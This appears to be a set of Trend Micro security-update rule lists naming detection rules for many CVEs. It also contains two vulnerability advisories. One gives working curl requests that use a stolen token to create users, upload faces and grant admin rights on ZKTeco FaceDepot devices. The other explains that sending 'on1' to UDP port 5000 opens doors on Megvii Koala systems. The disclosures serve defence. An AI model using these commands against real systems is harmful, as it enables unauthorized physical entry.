All Vulnerabilities
- * indicates a new version of an existing rule
Deep Packet Inspection Rules:
DCERPC Services
1010521 - Microsoft Windows Netlogon Elevation Of Privilege Vulnerability Over SMB (CVE-2020-1472)
Port Mapper Windows
1001033* - Windows Port Mapper Decoder
Windows Services RPC Server DCERPC
1010519* - Microsoft Windows Netlogon Elevation Of Privilege Vulnerability (CVE-2020-1472)
Integrity Monitoring Rules:
There are no new or updated Integrity Monitoring Rules in this Security Update.
Log Inspection Rules:
There are no new or updated Log Inspection Rules in this Security Update. - * indicates a new version of an existing rule
Deep Packet Inspection Rules:
Database IBM Informix Dynamic Server
1010458* - IBM Informix Dynamic Server Directory Traversal Vulnerability
Directory Server LDAP
1010491* - Microsoft Windows Active Directory Information Disclosure Vulnerability (CVE-2020-0664)
1010494* - Microsoft Windows Active Directory Information Disclosure Vulnerability (CVE-2020-0856)
Java RMI
1010501 - Oracle Java SE Remote Security Vulnerability Over RMI (CVE-2017-3241)
Trend Micro Deep Security Manager
1010487* - Trend Micro Vulnerability Protection And Deep Security Manager Authentication Bypass Vulnerabilities (CVE-2020-15601 and CVE-2020-15605)
TrendMicro SPLX Web Console
1010512 - Trend Micro ServerProtect For Linux Command Injection Vulnerability (CVE-2020-24561)
UWSGI Protocol
1010500 - Apache HTTP Server Mod_uwsgi Remote Code Execution Vulnerability (CVE-2020-11984)
Web Application PHP Based
1010499 - WordPress 'WP EasyCart Plugin' Shell Upload Vulnerability (CVE-2014-9308)
1010375* - WordPress 10Web Photo Gallery Plugin SQL Injection Vulnerability
Web Client Common
1010510 - Microsoft Visual Studio DDS File Parsing Integer Overflow Remote Code Execution Vulnerability (CVE-2020-16856)
1010509 - Microsoft Visual Studio DDS File Parsing Integer Overflow Remote Code Execution Vulnerability (CVE-2020-16874)
1010517 - Microsoft Windows Camera Codec Out-Of-Bounds Write Remote Code Execution Vulnerability (CVE-2020-0997)
1010507 - Microsoft Windows Codecs Library Remote Code Execution Vulnerability (CVE-2020-1129)
1010506 - Microsoft Windows Jet Database Engine Remote Code Execution Vulnerability (CVE-2020-1039)
1010505 - Microsoft Windows Jet Database Engine Remote Code Execution Vulnerability (CVE-2020-1074)
Web Client Internet Explorer/Edge
1010508 - Microsoft Windows Text Service Module Remote Code Execution Vulnerability (CVE-2020-0908)
Web Server Apache
1010496* - Apache Struts2 File Upload Denial of Service Vulnerability (CVE-2019-0233)
Web Server Common
1010513 - Microsoft Exchange Server DlpUtils Remote Code Execution Vulnerability (CVE-2020-16875)
1010204* - Nagios XI schedulereport.php Command Execution Vulnerability (CVE-2019-20197)
Web Server HTTPS
1010514 - Nagios XI 'command_test.php' Command Injection Vulnerability
1010492* - rConfig 'configDevice.php' Cross-Site Scripting Vulnerability (CVE-2020-12259)
Web Server Miscellaneous
1010495* - RichFaces Framework Deserialization Vulnerability (CVE-2013-2165)
1010480* - RichFaces Framework Expression Language Injection Vulnerability (CVE-2018-14667)
Windows Server DCERPC
1010519 - Microsoft Windows Netlogon Elevation Of Privilege Vulnerability (CVE-2020-1472)
Integrity Monitoring Rules:
1010515 - Trend Micro ServerProtect For Linux Command Execution Vulnerability (CVE-2020-24561)
Log Inspection Rules:
There are no new or updated Log Inspection Rules in this Security Update. - * indicates a new version of an existing rule
Deep Packet Inspection Rules:
Trend Micro Deep Security Manager
1010487* - Trend Micro Vulnerability Protection And Deep Security Manager Authentication Bypass Vulnerabilities (CVE-2020-15601 and CVE-2020-15605)
Integrity Monitoring Rules:
There are no new or updated Integrity Monitoring Rules in this Security Update.
Log Inspection Rules:
There are no new or updated Log Inspection Rules in this Security Update. - * indicates a new version of an existing rule
Deep Packet Inspection Rules:
Apache JServ Protocol
1010361* - Apache Tomcat Local File Inclusion Vulnerability (CVE-2020-1938)
Database IBM Informix Dynamic Server
1010458 - IBM Informix Dynamic Server Directory Traversal Vulnerability
Directory Server LDAP
1010491 - Microsoft Windows Active Directory Information Disclosure Vulnerability (CVE-2020-0664)
1010494 - Microsoft Windows Active Directory Information Disclosure Vulnerability (CVE-2020-0856)
HP Intelligent Management Center (IMC)
1010481* - Apache OFBiz XML-RPC Request Unsafe Deserialization Vulnerability (CVE-2020-9496)
Oracle SQL Net (TNS) Listener
1010475* - Oracle Database Server XML External Entity Injection Vulnerability (CVE-2014-6577)
Trend Micro Deep Security Manager
1010487 - Trend Micro Vulnerability Protection And Deep Security Manager Authentication Bypass Vulnerabilities (CVE-2020-15601 and CVE-2020-15605)
Web Application Common
1010483* - Dolibarr ERP CRM Remote Code Execution Vulnerability (CVE-2019-11200)
1010484* - Dolibarr ERP CRM Remote Code Execution Vulnerability (CVE-2019-11201)
1010344* - ThinkPHP Remote Code Execution Vulnerability (CVE-2019-9082)
Web Application PHP Based
1010212* - LibreNMS Collectd Command Injection Vulnerability (CVE-2019-10669)
Web Client Common
1010493 - Google Chrome WebGL Use After Free Vulnerability (CVE-2020-6492)
1005676* - Identified Download Of XML File With External Entity Reference
Web Server Apache
1010496 - Apache Struts2 File Upload Denial of Service Vulnerability (CVE-2019-0233)
Web Server Common
1010405* - JAWS Remote Code Execution Vulnerability
1010204 - Nagios XI schedulereport.php Command Execution Vulnerability (CVE-2019-20197)
Web Server HTTPS
1010490* - WordPress 'File Manager' Plugin Remote Code Execution Vulnerability
1010492 - rConfig 'configDevice.php' Cross-Site Scripting Vulnerability (CVE-2020-12259)
Web Server Miscellaneous
1010495 - RichFaces Framework Deserialization Vulnerability (CVE-2013-2165)
1010480 - RichFaces Framework Expression Language Injection Vulnerability (CVE-2018-14667)
Web Server Oracle
1010485* - Oracle WebLogic Server IIOP Protocol Insecure Deserialization Vulnerability (CVE-2020-14644)
1010478* - Oracle WebLogic Server T3 Protocol Insecure Deserialization Vulnerability (CVE-2020-14644)
Zoho ManageEngine
1010337* - Zoho ManageEngine OpManager Directory Traversal Vulnerability (CVE-2020-12116)
Integrity Monitoring Rules:
There are no new or updated Integrity Monitoring Rules in this Security Update.
Log Inspection Rules:
There are no new or updated Log Inspection Rules in this Security Update. - * indicates a new version of an existing rule
Deep Packet Inspection Rules:
Web Server HTTPS
1010490 - WordPress 'File Manager' Plugin Remote Code Execution Vulnerability
Integrity Monitoring Rules:
There are no new or updated Integrity Monitoring Rules in this Security Update.
Log Inspection Rules:
There are no new or updated Log Inspection Rules in this Security Update. - * indicates a new version of an existing rule
Deep Packet Inspection Rules:
DCERPC Services
1010164* - Identified Possible Ransomware File Extension Create Activity Over Network Share
Docker Daemon
1010326* - Identified Docker Daemon Remote API Call
HP Intelligent Management Center (IMC)
1010481 - Apache OFBiz XML-RPC Request Unsafe Deserialization Vulnerability (CVE-2020-9496)
Oracle SQL Net (TNS) Listener
1010475 - Oracle Database Server XML External Entity Injection Vulnerability (CVE-2014-6577)
Web Application Common
1010483 - Dolibarr ERP CRM Remote Code Execution Vulnerability (CVE-2019-11200)
1010484 - Dolibarr ERP CRM Remote Code Execution Vulnerability (CVE-2019-11201)
1010482 - Identified Reflected File Download Attack in URI Query Parameter
1005934* - Identified Suspicious Command Injection Attack
1010488 - Identified WordPress Database Reset Attempt
1010225* - Liferay Portal Untrusted Deserialization Vulnerability (CVE-2020-7961)
1010440* - OpenMRS Reflected Cross-Site Scripting Vulnerability (CVE-2020-5730)
Web Application PHP Based
1010212 - LibreNMS Collectd Command Injection Vulnerability (CVE-2019-10669)
Web Client Common
1008702* - Microsoft Windows GDI Information Disclosure Vulnerability (CVE-2017-11816)
1008171* - Microsoft Windows Graphics Component Information Disclosure Vulnerability (CVE-2017-0038)
1010469* - TeamViewer Desktop Remote Code Execution Vulnerability (CVE-2020-13699)
Web Client Internet Explorer/Edge
1008211* - Microsoft Edge Information Disclosure Vulnerability (CVE-2017-0065)
Web Server Apache
1010461* - Apache Struts2 Remote Code Execution Vulnerability (CVE-2019-0230)
Web Server Common
1010412* - Bolt CMS Authenticated Remote Code Execution Vulnerability
1000131* - HTTP Header Length Restriction
1010477 - Java Unserialize Remote Code Execution Vulnerability - 1
1010445* - Opmantek Open-AudIT Command Injection Vulnerability (CVE-2020-12078)
Web Server HTTPS
1010479 - Malware Ngioweb
Web Server Miscellaneous
1010463* - Solarwinds Virtualization Manager Apache Commons Collections Insecure Deserialization Vulnerability (CVE-2016-3642)
Web Server Oracle
1010474* - Oracle WebLogic Server IIOP Protocol Insecure Deserialization Vulnerability (CVE-2020-14625)
1010485 - Oracle WebLogic Server IIOP Protocol Insecure Deserialization Vulnerability (CVE-2020-14644)
1010478 - Oracle WebLogic Server T3 Protocol Insecure Deserialization Vulnerability (CVE-2020-14644)
1010447* - Oracle WebLogic Server T3 Protocol Insecure Deserialization Vulnerability (CVE-2020-14645)
Web Server SharePoint
1010335* - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2020-1181)
Zoho ManageEngine
1010448* - Zoho ManageEngine Applications Manager SQL Injection Vulnerability (CVE-2020-15533)
1010337 - Zoho ManageEngine OpManager Directory Traversal Vulnerability (CVE-2020-12116)
Integrity Monitoring Rules:
There are no new or updated Integrity Monitoring Rules in this Security Update.
Log Inspection Rules:
There are no new or updated Log Inspection Rules in this Security Update. - * indicates a new version of an existing rule
Deep Packet Inspection Rules:
IBM WebSphere Application Server
1010343* - IBM WebSphere UploadFileArgument Deserialization Vulnerability (CVE-2020-4448)
Plex Media Server
1010434* - Plex Media Server Remote Code Execution Vulnerability (CVE-2020-5741)
SSL Client
1010471 - Identified Weak 'Encryption Key' in New Session Ticket TLS Record
1010437* - Python SSL 'DistributionPoint Extension' NULL Pointer Dereference Vulnerability (CVE-2019-5010)
Web Application Common
1010368* - Dolibarr ERP And CRM Cross Site Scripting Vulnerability (CVE-2020-13094)
1010225* - Liferay Portal Untrusted Deserialization Vulnerability (CVE-2020-7961)
1010440 - OpenMRS Reflected Cross-Site Scripting Vulnerability (CVE-2020-5730)
1009350* - Telerik UI for ASP.NET AJAX Multiple Arbitrary File Upload Vulnerabilities (CVE-2017-11357 and CVE-2017-11317)
1010344* - ThinkPHP Remote Code Execution Vulnerability (CVE-2019-9082)
1010074* - Unsecured Credentials - Cloud Instance Metadata API (ATT&CK T1552.005)
Web Application Tomcat
1010457* - Apache Tomcat WebSocket Infinite Loop Denial Of Service Vulnerability (CVE-2020-13935)
Web Client Common
1010148* - Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB20-05) - 1
1010467 - Microsoft Graphics Components Remote Code Execution Vulnerability (CVE-2020-1561)
1010466 - Microsoft Windows Codecs Library Remote Code Execution Vulnerability (CVE-2020-1560)
1010468 - Microsoft Windows Font Driver Host Remote Code Execution Vulnerability (CVE-2020-1520)
1010476 - Microsoft Windows MSI File Signature Spoofing Vulnerability (CVE-2020-1464)
1010464 - Microsoft Windows Media Foundation Memory Corruption Vulnerability (CVE-2020-1492)
1009067* - Microsoft Windows VBScript Engine Remote Code Execution Vulnerability (CVE-2018-8174)
1010469 - TeamViewer Desktop Remote Code Execution Vulnerability (CVE-2020-13699)
Web Client Internet Explorer/Edge
1010470 - Microsoft Edge Scripting Engine Memory Corruption Vulnerability (CVE-2020-1555)
Web Server Apache
1004824* - Apache HTTP Server 'mod_proxy' Reverse Proxy Exposure (CVE-2011-3368)
1010461* - Apache Struts2 Remote Code Execution Vulnerability (CVE-2019-0230)
Web Server Common
1004859* - Blocked HTTP Header: Request Contains Header Not Present In Approved Header List
1010412 - Bolt CMS Authenticated Remote Code Execution Vulnerability
1010445 - Opmantek Open-AudIT Command Injection Vulnerability (CVE-2020-12078)
1010416* - Pandora FMS Events Remote Command Execution Vulnerability (CVE-2020-13851)
1010459* - vBulletin 'subwidgetConfig' Unauthenticated Remote Code Execution Vulnerability (CVE-2020-17496)
Web Server Miscellaneous
1010463 - Solarwinds Virtualization Manager Apache Commons Collections Insecure Deserialization Vulnerability (CVE-2016-3642)
Web Server Oracle
1010474 - Oracle WebLogic Server IIOP Protocol Insecure Deserialization Vulnerability (CVE-2020-14625)
1010415* - Oracle WebLogic Server T3 Protocol Insecure Deserialization Vulnerability (CVE-2020-14625)
Zoho ManageEngine
1010448 - Zoho ManageEngine Applications Manager SQL Injection Vulnerability (CVE-2020-15533)
Integrity Monitoring Rules:
1010422 - SCP - Remote File Copy (ATT&CK T1105, T1048.001)
Log Inspection Rules:
There are no new or updated Log Inspection Rules in this Security Update. - ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 improper privilege vulnerability
Severity: :Publish Date:  19 de августа de 2020A token-reuse vulnerability in ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 allows an attacker to create arbitrary new users, elevate users to administrators, delete users, and download user faces from the database.
The vulnerability has been submitted to ZDI on Dec 3, 2019.
ZDI got one response from the vendor which acknowledged but not confirmed the vulnerability. The responsible disclosure was expired on April 30, 2020.
Details
ZKBiosecurity Server does not do client authentication except the long-lasting token (cf. CVE-2020-17473). One has to identify which FaceDepot tablet is allowed to register a new user by sniffing the network for a period of time. After obtaining the token of the tablet, one is able to
- Add a new arbitrary user (who may enter the office),
- Upload a new picture (allow an adversary to physically infiltrate),
- Delete an account (after a mission),
- Escalate the privilege of the new use user admin (able to operate / configure the tablet in front of it.)
Add a new user
-------------- curl -v -L -X POST -A 'iClock Proxy/1.09' 'http://192.168.0.1:8088/iclock/cdata?SN=LSR1915060003&table=tabledata&tablename=user&count=1' \ -b 'token=a72182ceb8e4695ea84300155953566d' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \ -H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN' -d@bugoy.user.post Where the content of bugoy.user.post is (tab separated): user uuid= cardno= pin=11111 password= group=1 starttime=0 endtime=0 name=Bugoy privilege=0 disable=0 verify=0
Upload a new picture to the server
---------------------------------- curl -XPOST -A 'iClock Proxy/1.09' 'http://192.168.0.1:8088/iclock/cdata?SN=LSR1915060016&table=tabledata&tablename=biophoto&count=1' \ -b 'token=8bd7f4495e0ac8781f4bba195827fcda' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \ -H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN' -d@totoro.post
The content of totoro.post is a bit tricky, because the picture is in base64:
biophoto pin= filename=.jpg type= size= content=
After a new picture is uploaded, wait until a scheduled time where all FaceDepot tablets are synchronized or when the admin clicks "Update" on the screen.
Escalate the privilege to admin
-------------------------------
Users with "privilege=14" have the admin access to FaceDepot tablet. With the privilege, one can configure the tablet in front of it, to add users, set user privilege, delete users, browse user database, install APK via USB (exposed at the bottom of FaceDepot 7B), and switch to apps other than ZKTeco launcher.curl -v -L -X POST -A 'iClock Proxy/1.09' 'http://192.168.0.1:8088/iclock/cdata?SN=LSR1915060003&table=tabledata&tablename=user&count=1' \ -b 'token=a72182ceb8e4695ea84300155953566d' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \ -H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN' -d@admin.post
Where the content of admin.post is (tab separated):
user uuid=2645 cardno= pin=12345 password= group=1 starttime=0 endtime=0 name=Bugoy privilege=14 disable=0 verify=0
Vulnerability Type
CWE-269: Improper Privilege ManagementAttack Type: Remote
Impact Information Disclosure: True
Attack Vectors
The attacker must have access to LAN and use cURL to send HTTP GET/POST.
The attack can be conducted by calling API commands with a long-lasting token.Mitigation
Deploy a firewall in front of ZKBiosecurity Server and enforce allowed IP list and allowed MAC list.
Deny all unlisted access.Discoverer: Roel Reyes, Joey Costoya, Philippe Lin, Vincenzo Ciancaglini, Morton Swimmer
Reference: https://www.zkteco.com/en/product_detail/FaceDepot-7B.html
- Megvii Koala 2.9.1-c3s architectural vulnerability on network relays
Severity: :Publish Date:  19 de августа de 2020Lack of authentication in the network relays used in MEGVII Koala 2.9.1-c3sallows attackers to grant physical access to anyone by sending packet data to UDP port 5000 of any network relays connected to doors.
The vulnerability has been submitted to ZDI on March 20, 2020 as ZDI-CAN-10793.
The vendor has acknowledged and confirmed the vulnerability and said the production has reached end-of-line while a patch is available in newer products. We are not able to confirm the vendor's statement.The vendor has published a public advisory and asks the customers to upgrade the software when it is available. Product lines impacted by similar vulnerability will have patches in August 2020.Details
Megvii Koala is a facial recognition system sold by Megvii. It is marketed towards factory, company concierge, apartment complex, etc. There are several hardware configurations, depending on the system integrator.
The weakness is in the architecture of the Megvii Koala system. The weakest link is the network relay, which has to be either HHT-NET2D or TCP-KP-I404. When an adversary has access to the internal network, one has only to send the string "on1" to UDP port 5000 of all the devices in the network to open all the doors.
The architecture, according to the instruction manual provided by the vendor, is like,
---------------------------- UDP 5000 COM/ON/OFF | --------- ------ | --------------> HHT-NET2D ------------> Door | | Backend | <---> | Edge | | | --------- ------ | <--- HTTP ----> Samsung Tablet ---------------------------- USB-C Cable
To our best knowledge, no firewall is recommended in user instruction manuals.
Vulnerability Type
CWE-862: Missing AuthorizationAttack Type: Remote
Attack Vectors
To exploit vulnerability, attackers have to have access to LAN of the facial recognition access controller.Mitigation
Deploy a firewall in front of network relays and allow UDP 5000 from Megvii edge server only.
Deny all other connections.Discoverer
Roel Reyes, Joey Costoya, Philippe Lin, Vincenzo Ciancaglini, Morton Swimmer
Reference
Public advisory from the vendor: http://techsupport.megvii.com/hc/kb/article/1401343/ - * indicates a new version of an existing rule
Deep Packet Inspection Rules:
ActiveMQ OpenWire
1010428* - Apache ActiveMQ Unsafe Deserialization Vulnerability (CVE-2015-5254)
DNS Client
1010352* - Data Exfiltration Over DNS (Response) Protocol (T1048)
Plex Media Server
1010434 - Plex Media Server Remote Code Execution Vulnerability (CVE-2020-5741)
SSL Client
1010437 - Python SSL 'DistributionPoint Extension' NULL Pointer Dereference Vulnerability (CVE-2019-5010)
Suspicious Server Application Activity
1003593* - Detected SSH Server Traffic (ATT&CK T1021)
1010462 - Malware Drovorub
Web Application Common
1010368 - Dolibarr ERP And CRM Cross Site Scripting Vulnerability (CVE-2020-13094)
1010391* - Expat XML Parsing Buffer Overflow Vulnerability (CVE-2016-0718) - Server
Web Application Tomcat
1010457 - Apache Tomcat WebSocket Infinite Loop Denial Of Service Vulnerability (CVE-2020-13935)
1010444 - Identified Too Many Incoming HTTP/2 Requests
Web Client Common
1010456 - Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB20-48) - 1
1010452 - Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB20-48) - 2
1010451 - Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB20-48) - 3
1010460 - Google Chrome 'BlobRegistryImpl' Use-After-Free Vulnerability (CVE-2020-6461)
1010453 - Microsoft Windows Codecs Library Remote Code Execution Vulnerability (CVE-2020-1574)
1010454 - Microsoft Windows Codecs Library Remote Code Execution Vulnerability (CVE-2020-1585)
1010455 - Microsoft Windows DirectWrite Information Disclosure Vulnerability (CVE-2020-1577)
Web Server Apache
1010461 - Apache Struts2 Remote Code Execution Vulnerability (CVE-2019-0230)
Web Server Common
1006540* - Enable X-Forwarded-For HTTP Header Logging
1010418* - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2020-1147)
1010416 - Pandora FMS Events Remote Command Execution Vulnerability (CVE-2020-13851)
1010443* - rConfig 'Devicemgmt.php' Cross-Site Scripting Vulnerability (CVE-2020-12256)
1010459 - vBulletin 'subwidgetConfig' Unauthenticated Remote Code Execution Vulnerability (CVE-2020-17496)
Web Server Miscellaneous
1010346* - Identified HTTP Request With HTTP/0.9 In Request Line
Web Server Oracle
1010447 - Oracle WebLogic Server T3 Protocol Insecure Deserialization Vulnerability (CVE-2020-14645)
ZohoCorp ManageEngine Desktop Central
1010407* - Zoho ManageEngine Desktop Central AppDependency Arbitrary File Write Vulnerability (CVE-2020-10859)
Integrity Monitoring Rules:
There are no new or updated Integrity Monitoring Rules in this Security Update.
Log Inspection Rules:
1008852* - Auditd